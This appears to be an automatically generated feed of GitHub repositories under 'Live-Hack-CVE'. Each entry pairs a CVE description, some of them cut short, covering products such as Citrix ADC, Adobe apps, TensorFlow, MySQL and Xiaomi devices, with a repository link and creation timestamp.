**Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows unauthenticated access to certain URL endpoints. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8193](https://github.com/Live-Hack-CVE/CVE-2020-8193) create time: 2022-12-29T16:12:58Z

**Out-of-bounds write vulnerability in the power consumption module. Successful exploitation of this vulnerability may cause the system to restart. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36600](https://github.com/Live-Hack-CVE/CVE-2020-36600) create time: 2022-12-29T16:11:51Z

**Out-of-bounds write vulnerability in the kernel modules. Successful exploitation of this vulnerability may cause a panic reboot. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36601](https://github.com/Live-Hack-CVE/CVE-2020-36601) create time: 2022-12-29T16:11:48Z

**A vulnerability in agent program of HelpU remote control solution could allow an authenticated remote attacker to execute arbitrary commands This vulnerability is due to insufficient input santization when communicating customer process. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7862](https://github.com/Live-Hack-CVE/CVE-2020-7862) create time: 2022-12-29T16:08:07Z

**An exploitable code execution vulnerability exists in the file format parsing functionality of Graphisoft BIMx Desktop Viewer 2019.2.2328. A specially crafted file can cause a heap buffer overflow resulting in a code execution. An attacker can provide a malicious file to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6099](https://github.com/Live-Hack-CVE/CVE-2020-6099) create time: 2022-12-29T16:08:00Z

**Spring Cloud Config, versions 2.2.x prior to 2.2.3, versions 2.1.x prior to 2.1.9, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead to a di CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-5410](https://github.com/Live-Hack-CVE/CVE-2020-5410) create time: 2022-12-29T16:07:52Z

**Reactor Netty HttpServer, versions 0.9.3 and 0.9.4, is exposed to a URISyntaxException that causes the connection to be closed prematurely instead of producing a 400 response. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-5403](https://github.com/Live-Hack-CVE/CVE-2020-5403) create time: 2022-12-29T16:07:49Z

**Dell EMC Data Protection Advisor versions 6.4, 6.5 and 18.1 contain an undocumented account with limited privileges that is protected with a hard-coded password. A remote unauthenticated malicious user with the knowledge of the hard-coded password may login to the system and gain read-only privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-5351](https://github.com/Live-Hack-CVE/CVE-2020-5351) create time: 2022-12-29T16:07:45Z

**A user who owns an ENS domain can set a trapdoor, allowing them to transfer ownership to another user, and later regain ownership without the new owners consent or awareness. A new ENS deployment is being rolled out that fixes this vulnerability in the ENS registry. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-5232](https://github.com/Live-Hack-CVE/CVE-2020-5232) create time: 2022-12-29T16:07:20Z

**In Conjur OSS Helm Chart before 2.0.0, a recently identified critical vulnerability resulted in the installation of the Conjur Postgres database with an open port. This allows an attacker to gain full read & write access to the Conjur Postgres database, including escalating the attacker's privileges to assume full cont CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-4062](https://github.com/Live-Hack-CVE/CVE-2020-4062) create time: 2022-12-29T16:07:12Z

**HCL Domino is affected by an Insufficient Access Control vulnerability. An authenticated attacker with local access to the system could exploit this vulnerability to attain escalation of privileges, denial of service, or information disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-4107](https://github.com/Live-Hack-CVE/CVE-2020-4107) create time: 2022-12-29T16:07:09Z

**Multiple vulnerabilities in the Distance Vector Multicast Routing Protocol (DVMRP) feature of Cisco IOS XR Software could allow an unauthenticated, remote attacker to either immediately crash the Internet Group Management Protocol (IGMP) process or make it consume available memory and eventually crash. The memory consu CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-3569](https://github.com/Live-Hack-CVE/CVE-2020-3569) create time: 2022-12-29T16:07:05Z

**The /rest/api/1.0/render resource in Jira Server and Data Center before version 8.5.13, from version 8.6.0 before version 8.13.5, and from version 8.14.0 before version 8.15.1 allows remote anonymous attackers to determine if a username is valid or not via a missing permissions check. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36238](https://github.com/Live-Hack-CVE/CVE-2020-36238) create time: 2022-12-29T16:07:01Z

**The dashboard gadgets preference resource of the Atlassian gadgets plugin used in Jira Server and Jira Data Center before version 8.13.5, and from version 8.14.0 before version 8.15.1 allows remote anonymous attackers to obtain gadget related settings via a missing permissions check. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36287](https://github.com/Live-Hack-CVE/CVE-2020-36287) create time: 2022-12-29T16:06:57Z

**Insecure configuration of default ObjectMapper in com.vaadin:flow-server versions 3.0.0 through 3.0.5 (Vaadin 15.0.0 through 15.0.4) may expose sensitive data if the application also uses e.g. @RestController CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36319](https://github.com/Live-Hack-CVE/CVE-2020-36319) create time: 2022-12-29T16:06:53Z

**A flaw was found in libwebp in versions before 1.0.1. When reading a file libwebp allocates an excessive amount of memory. The highest threat from this vulnerability is to the service availability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36332](https://github.com/Live-Hack-CVE/CVE-2020-36332) create time: 2022-12-29T16:06:49Z

**OpenVPN Access Server 2.7.3 to 2.8.7 allows remote attackers to trigger an assert during the user authentication phase via incorrect authentication token data in an early phase of the user authentication resulting in a denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36382](https://github.com/Live-Hack-CVE/CVE-2020-36382) create time: 2022-12-29T16:06:46Z

**Libsixel prior to v1.8.3 contains a stack buffer overflow in the function gif_process_raster at fromgif.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-21050](https://github.com/Live-Hack-CVE/CVE-2020-21050) create time: 2022-12-29T16:04:40Z

**Command Injection in Simiki v1.6.2.1 and prior allows remote attackers to execute arbitrary system commands via line 64 of the component 'simiki/blob/master/simiki/config.py'. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-19001](https://github.com/Live-Hack-CVE/CVE-2020-19001) create time: 2022-12-29T16:04:26Z

**An issue in craigms/main.php of CraigMS 1.0 allows attackers to execute arbitrary commands via a crafted input entered into the DB Name field. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-18048](https://github.com/Live-Hack-CVE/CVE-2020-18048) create time: 2022-12-29T16:04:22Z

**An issue was discovered in gpac 0.8.0. The strdup function in box_code_base.c has a heap-based buffer over-read. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-19750](https://github.com/Live-Hack-CVE/CVE-2020-19750) create time: 2022-12-29T16:04:18Z

**An issue was discovered in gpac 0.8.0. The gf_odf_del_ipmp_tool function in odf_code.c has a heap-based buffer over-read. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-19751](https://github.com/Live-Hack-CVE/CVE-2020-19751) create time: 2022-12-29T16:04:15Z

**An uncontrolled memory allocation in DataBufdata(subBox.length-sizeof(box)) function of Exiv2 0.27 allows attackers to cause a denial of service (DOS) via a crafted input. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-18899](https://github.com/Live-Hack-CVE/CVE-2020-18899) create time: 2022-12-29T16:04:11Z

**Command Injection in PHPMyWind v5.6 allows remote attackers to execute arbitrary code via the "text color" field of the component '/admin/web_config.php'. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-18885](https://github.com/Live-Hack-CVE/CVE-2020-18885) create time: 2022-12-29T16:04:07Z

**In Libav 12.3, there is a heap-based buffer over-read in vc1_decode_p_mb_intfi in vc1_block.c that allows an attacker to cause denial-of-service via a crafted file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-18778](https://github.com/Live-Hack-CVE/CVE-2020-18778) create time: 2022-12-29T16:04:04Z

**In Libav 12.3, there is a heap-based buffer over-read in vc1_decode_b_mb_intfi in vc1_block.c that allows an attacker to cause denial-of-service via a crafted file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-18775](https://github.com/Live-Hack-CVE/CVE-2020-18775) create time: 2022-12-29T16:04:00Z

**Exiv2 0.27.99.0 has a global buffer over-read in Exiv2::Internal::Nikon1MakerNote::print0x0088 in nikonmn_int.cpp which can result in an information leak. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-18771](https://github.com/Live-Hack-CVE/CVE-2020-18771) create time: 2022-12-29T16:03:57Z

**6Kare Emakin 5.0.341.0 is affected by Cross Site Scripting (XSS) via the /rpc/membership/setProfile DisplayName field, which is mishandled when rendering the Activity Stream page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25491](https://github.com/Live-Hack-CVE/CVE-2020-25491) create time: 2022-12-29T15:28:43Z

**ownCloud owncloud/client before 2.7 allows DLL Injection. The desktop client loaded development plugins from certain directories when they were present. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28646](https://github.com/Live-Hack-CVE/CVE-2020-28646) create time: 2022-12-29T15:24:05Z

**Out-of-bounds heap read vulnerability in the HW_KEYMASTER module. Successful exploitation of this vulnerability may cause out-of-bounds access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40019](https://github.com/Live-Hack-CVE/CVE-2021-40019) create time: 2022-12-29T16:12:40Z

**Cross Site Scripting (XSS vulnerability exists in )Sourcecodester News247 News Magazine (CMS) PHP 5.6 or higher and MySQL 5.7 or higher via the blog category name field CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41731](https://github.com/Live-Hack-CVE/CVE-2021-41731) create time: 2022-12-29T16:11:37Z

**A Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Storage Unit Rental Management System PHP 8.0.10 , Apache 2.4.14, SURMS V 1.0 via the Add New Tenant List Rent List form. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42597](https://github.com/Live-Hack-CVE/CVE-2021-42597) create time: 2022-12-29T16:11:30Z

**In certain Moodle products after creating a course, it is possible to add in a arbitrary "Topic" a resource, in this case a "Database" with the type "Text" where its values "Field name" and "Field description" are vulnerable to Cross Site Scripting Stored(XSS). This affects Moodle 3.11 and Moodle 3.10.4 and Moodle 3.9. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36568](https://github.com/Live-Hack-CVE/CVE-2021-36568) create time: 2022-12-29T16:03:37Z

**ownCloud owncloud/client before 2.9.2 allows Resource Injection by a server into the desktop client via a URL, leading to remote code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44537](https://github.com/Live-Hack-CVE/CVE-2021-44537) create time: 2022-12-29T15:24:01Z

**Adobe InCopy version 17.3 (and earlier) and 16.4.2 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38403](https://github.com/Live-Hack-CVE/CVE-2022-38403) create time: 2022-12-29T16:13:02Z

**Adobe InCopy version 17.3 (and earlier) and 16.4.2 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38404](https://github.com/Live-Hack-CVE/CVE-2022-38404) create time: 2022-12-29T16:12:54Z

**Adobe InCopy version 17.3 (and earlier) and 16.4.2 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38405](https://github.com/Live-Hack-CVE/CVE-2022-38405) create time: 2022-12-29T16:12:51Z

**Adobe InCopy version 17.3 (and earlier) and 16.4.2 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38406](https://github.com/Live-Hack-CVE/CVE-2022-38406) create time: 2022-12-29T16:12:47Z

**Those using Jettison to parse untrusted XML or JSON data may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by Out of memory. This effect may support a denial of service attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40150](https://github.com/Live-Hack-CVE/CVE-2022-40150) create time: 2022-12-29T16:12:44Z

**Adobe InCopy version 17.3 (and earlier) and 16.4.2 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38407](https://github.com/Live-Hack-CVE/CVE-2022-38407) create time: 2022-12-29T16:12:21Z

**TensorFlow is an open source platform for machine learning. The `AvgPoolOp` function takes an argument `ksize` that must be positive but is not checked. A negative `ksize` can trigger a `CHECK` failure and crash the program. We have patched the issue in GitHub commit 3a6ac52664c6c095aa2b114e742b0aa17fdce78f. The fix wi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35941](https://github.com/Live-Hack-CVE/CVE-2022-35941) create time: 2022-12-29T16:12:17Z

**TensorFlow is an open source platform for machine learning. The `UnbatchGradOp` function takes an argument `id` that is assumed to be a scalar. A nonscalar `id` can trigger a `CHECK` failure and crash the program. It also requires its argument `batch_index` to contain three times the number of elements as indicated in CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35952](https://github.com/Live-Hack-CVE/CVE-2022-35952) create time: 2022-12-29T16:12:13Z

**TensorFlow is an open source platform for machine learning. The `RaggedRangOp` function takes an argument `limits` that is eventually used to construct a `TensorShape` as an `int64`. If `limits` is a very large float, it can overflow when converted to an `int64`. This triggers an `InvalidArgument` but also throws an ab CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35940](https://github.com/Live-Hack-CVE/CVE-2022-35940) create time: 2022-12-29T16:12:10Z

**Those using Xstream to seralize XML data may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow. This effect may support a denial of service attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40151](https://github.com/Live-Hack-CVE/CVE-2022-40151) create time: 2022-12-29T16:12:06Z

**Adobe Photoshop versions 22.5.8 (and earlier) and 23.4.2 (and earlier) are affected by an Access of Uninitialized Pointer vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38426](https://github.com/Live-Hack-CVE/CVE-2022-38426) create time: 2022-12-29T16:12:02Z

**Those using Xstream to seralize XML data may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow. This effect may support a denial of service attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40153](https://github.com/Live-Hack-CVE/CVE-2022-40153) create time: 2022-12-29T16:11:58Z

**Cross-site Scripting (XSS) - Stored in GitHub repository jgraph/drawio prior to 20.3.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3223](https://github.com/Live-Hack-CVE/CVE-2022-3223) create time: 2022-12-29T16:11:55Z

**Adobe Photoshop versions 22.5.8 (and earlier) and 23.4.2 (and earlier) are affected by an Access of Uninitialized Pointer vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38427](https://github.com/Live-Hack-CVE/CVE-2022-38427) create time: 2022-12-29T16:11:44Z

**OASES (aka Open Aviation Strategic Engineering System) 8.8.0.2 allows attackers to execute arbitrary code via the Open Print Folder menu. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40337](https://github.com/Live-Hack-CVE/CVE-2022-40337) create time: 2022-12-29T16:11:40Z

**There is a heap-buffer-overflow in GIFLIB 5.2.1 function DumpScreen2RGB() in gif2rgb.c:298:45. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28506](https://github.com/Live-Hack-CVE/CVE-2022-28506) create time: 2022-12-29T16:11:33Z

**An integer overflow vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in GPU component of Linux kernel with device file '/dev/dri/renderD128 (or Dxxx)'. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36402](https://github.com/Live-Hack-CVE/CVE-2022-36402) create time: 2022-12-29T16:11:17Z

**The MPlayer Project mplayer SVN-r38374-13.0.1 is vulnerable to memory corruption via function free_mp_image() of libmpcodecs/mp_image.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38861](https://github.com/Live-Hack-CVE/CVE-2022-38861) create time: 2022-12-29T16:11:13Z

**Genesys PureConnect Interaction Web Tools Chat Service (up to at least 26- September- 2019) allows XSS within the Printable Chat History via the participant -> name JSON POST parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37775](https://github.com/Live-Hack-CVE/CVE-2022-37775) create time: 2022-12-29T16:11:10Z

**Adobe Illustrator versions 26.4 (and earlier) and 25.4.7 (and earlier) are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. requires u CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38408](https://github.com/Live-Hack-CVE/CVE-2022-38408) create time: 2022-12-29T16:11:06Z

**Adobe Photoshop versions 22.5.8 (and earlier) and 23.4.2 (and earlier) are affected by a Use After Free vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38428](https://github.com/Live-Hack-CVE/CVE-2022-38428) create time: 2022-12-29T16:11:02Z

**Adobe Illustrator versions 26.4 (and earlier) and 25.4.7 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a v CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38410](https://github.com/Live-Hack-CVE/CVE-2022-38410) create time: 2022-12-29T16:10:58Z

**Adobe Illustrator versions 26.4 (and earlier) and 25.4.7 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a v CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38409](https://github.com/Live-Hack-CVE/CVE-2022-38409) create time: 2022-12-29T16:10:55Z

**Adobe Animate version 21.0.11 (and earlier) and 22.0.7 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38411](https://github.com/Live-Hack-CVE/CVE-2022-38411) create time: 2022-12-29T16:10:49Z

**Adobe Animate version 21.0.11 (and earlier) and 22.0.7 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current us CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38412](https://github.com/Live-Hack-CVE/CVE-2022-38412) create time: 2022-12-29T16:10:46Z

**Adobe InDesign versions 16.4.2 (and earlier) and 17.3 (and earlier) are affected by by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28852](https://github.com/Live-Hack-CVE/CVE-2022-28852) create time: 2022-12-29T16:10:31Z

**Adobe InDesign versions 16.4.2 (and earlier) and 17.3 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28853](https://github.com/Live-Hack-CVE/CVE-2022-28853) create time: 2022-12-29T16:10:27Z

**Adobe InDesign versions 16.4.2 (and earlier) and 17.3 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a vict CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28854](https://github.com/Live-Hack-CVE/CVE-2022-28854) create time: 2022-12-29T16:10:24Z

**Adobe InDesign versions 16.4.2 (and earlier) and 17.3 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a vict CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28856](https://github.com/Live-Hack-CVE/CVE-2022-28856) create time: 2022-12-29T16:10:20Z

**Adobe InDesign versions 16.4.2 (and earlier) and 17.3 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a vict CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28855](https://github.com/Live-Hack-CVE/CVE-2022-28855) create time: 2022-12-29T16:10:16Z

**The centralized management feature for Utimaco Safeguard stores hard-coded cryptographic keys in executable programs for encrypted configuration files, which allows attackers to recover the keys from the configuration files and decrypt the disk drive. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2006-7142](https://github.com/Live-Hack-CVE/CVE-2006-7142) create time: 2022-12-29T14:41:16Z

**Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows local users to affect confidentiality and integrity via unknown vectors related to Server Install. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-2391](https://github.com/Live-Hack-CVE/CVE-2013-2391) create time: 2022-12-29T15:19:23Z

**Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.34 and earlier, and 5.6.14 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Replication. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-0420](https://github.com/Live-Hack-CVE/CVE-2014-0420) create time: 2022-12-29T15:19:30Z

**Unspecified vulnerability Oracle the MySQL Server component 5.5.35 and earlier and 5.6.15 and earlier allows remote authenticated users to affect availability via unknown vectors related to Federated. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-2432](https://github.com/Live-Hack-CVE/CVE-2014-2432) create time: 2022-12-29T15:19:27Z

**Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.35 and earlier and 5.6.15 and earlier allows remote authenticated users to affect availability via vectors related to ENFED. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-4243](https://github.com/Live-Hack-CVE/CVE-2014-4243) create time: 2022-12-29T15:19:19Z

**Unspecified vulnerability in Oracle MySQL 5.6.28 and earlier and 5.7.10 and earlier and MariaDB 10.0.x before 10.0.24 and 10.1.x before 10.1.12 allows local users to affect availability via vectors related to InnoDB. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-0668](https://github.com/Live-Hack-CVE/CVE-2016-0668) create time: 2022-12-29T15:19:16Z

**In the ebuild package through smokeping-2.7.3-r1 for SmokePing on Gentoo, the initscript allows the smokeping user to gain ownership of any file, allowing for the smokeping user to gain root privileges. There is a race condition involving /var/lib/smokeping and chown. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-20015](https://github.com/Live-Hack-CVE/CVE-2016-20015) create time: 2022-12-29T14:46:25Z

**The gyroscope on Xiaomi Mi 5s devices allows attackers to cause a denial of service (resonance and false data) via a 20.4 kHz audio signal, aka a MEMS ultrasound attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-20823](https://github.com/Live-Hack-CVE/CVE-2018-20823) create time: 2022-12-29T14:43:37Z

**Xiaomi Mi 5s Plus devices allow attackers to trigger touchscreen anomalies via a radio signal between 198 kHz and 203 kHz, as demonstrated by a transmitter and antenna hidden just beneath the surface of a coffee-shop table, aka Ghost Touch. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-12762](https://github.com/Live-Hack-CVE/CVE-2019-12762) create time: 2022-12-29T14:43:41Z

**On Xiaomi MIX 2 devices with the 4.4.78 kernel, a NULL pointer dereference in the ioctl interface of the device file /dev/elliptic1 or /dev/elliptic0 causes a system crash via IOCTL 0x4008c575 (aka decimal 1074316661). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-8413](https://github.com/Live-Hack-CVE/CVE-2019-8413) create time: 2022-12-29T14:43:34Z

**In LibRaw, an out-of-bounds read vulnerability exists within the "LibRaw::adobe_copy_pixel()" function (libraw\src\decoders\dng.cpp) when reading data from the image file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35533](https://github.com/Live-Hack-CVE/CVE-2020-35533) create time: 2022-12-29T14:48:46Z

**There is an out-of-bounds read and write vulnerability in some headset products. An unauthenticated attacker gets the device physically and crafts malformed message with specific parameter and sends the message to the affected products. Due to insufficient validation of message, which may be exploited to cause out-of-b CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36602](https://github.com/Live-Hack-CVE/CVE-2020-36602) create time: 2022-12-29T14:45:14Z

**A permission bypass vulnerability in Huawei cross device task management could allow an attacker to access certain resource in the attacked devices. Affected product versions include:JAD-AL50 versions 102.0.0.225(C00E220R3P4). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46834](https://github.com/Live-Hack-CVE/CVE-2021-46834) create time: 2022-12-29T14:46:11Z

**There is a traffic hijacking vulnerability in WS7200-10 11.0.2.13. Successful exploitation of this vulnerability can cause packets to be hijacked by attackers. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46835](https://github.com/Live-Hack-CVE/CVE-2021-46835) create time: 2022-12-29T14:43:55Z

**Trend Micro Security 2021 and 2022 (Consumer) is vulnerable to an Out-Of-Bounds Read Information Disclosure Vulnerability that could allow an attacker to read sensitive information from other memory locations and cause a crash on an affected machine. This vulnerability is similar to, but not the same as CVE-2022-35234. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37347](https://github.com/Live-Hack-CVE/CVE-2022-37347) create time: 2022-12-29T14:43:17Z

**Trend Micro Security 2021 and 2022 (Consumer) is vulnerable to an Out-Of-Bounds Read Information Disclosure Vulnerability that could allow an attacker to read sensitive information from other memory locations and cause a crash on an affected machine. This vulnerability is similar to, but not the same as CVE-2022-37347. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37348](https://github.com/Live-Hack-CVE/CVE-2022-37348) create time: 2022-12-29T14:43:10Z

**An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Monterey 12.0.1, macOS Big Sur 11.6.2. A malicious application may be able to execute arbitrary code with system privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-31002](https://github.com/Live-Hack-CVE/CVE-2021-31002) create time: 2022-12-29T14:42:16Z

**An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Monterey 12.1, iOS 15.2 and iPadOS 15.2, macOS Big Sur 11.6.2. Processing a maliciously crafted font may result in the disclosure of process memory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-31013](https://github.com/Live-Hack-CVE/CVE-2021-31013) create time: 2022-12-29T14:42:00Z

**A vulnerability in Keylime before 6.3.0 allows an attacker to craft a request to the agent that resets the U and V keys as if the agent were being re-added to a verifier. This could lead to a remote code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43310](https://github.com/Live-Hack-CVE/CVE-2021-43310) create time: 2022-12-29T14:40:04Z

**Improper authentication in firmware for some Intel(R) SSD DC Products may allow an unauthenticated user to potentially enable escalation of privilege via physical access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33076](https://github.com/Live-Hack-CVE/CVE-2021-33076) create time: 2022-12-29T14:37:54Z

**Protection mechanism failure in firmware for some Intel(R) SSD DC Products may allow a privileged user to potentially enable information disclosure via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33079](https://github.com/Live-Hack-CVE/CVE-2021-33079) create time: 2022-12-29T14:37:47Z

**Vulnerabilities in the ClearPass Policy Manager web-based management interface allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise in CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37883](https://github.com/Live-Hack-CVE/CVE-2022-37883) create time: 2022-12-29T14:49:11Z

**DLL hijacking vulnerability in Smart Switch PC prior to version 4.3.22083_3 allows attacker to execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39846](https://github.com/Live-Hack-CVE/CVE-2022-39846) create time: 2022-12-29T14:49:08Z

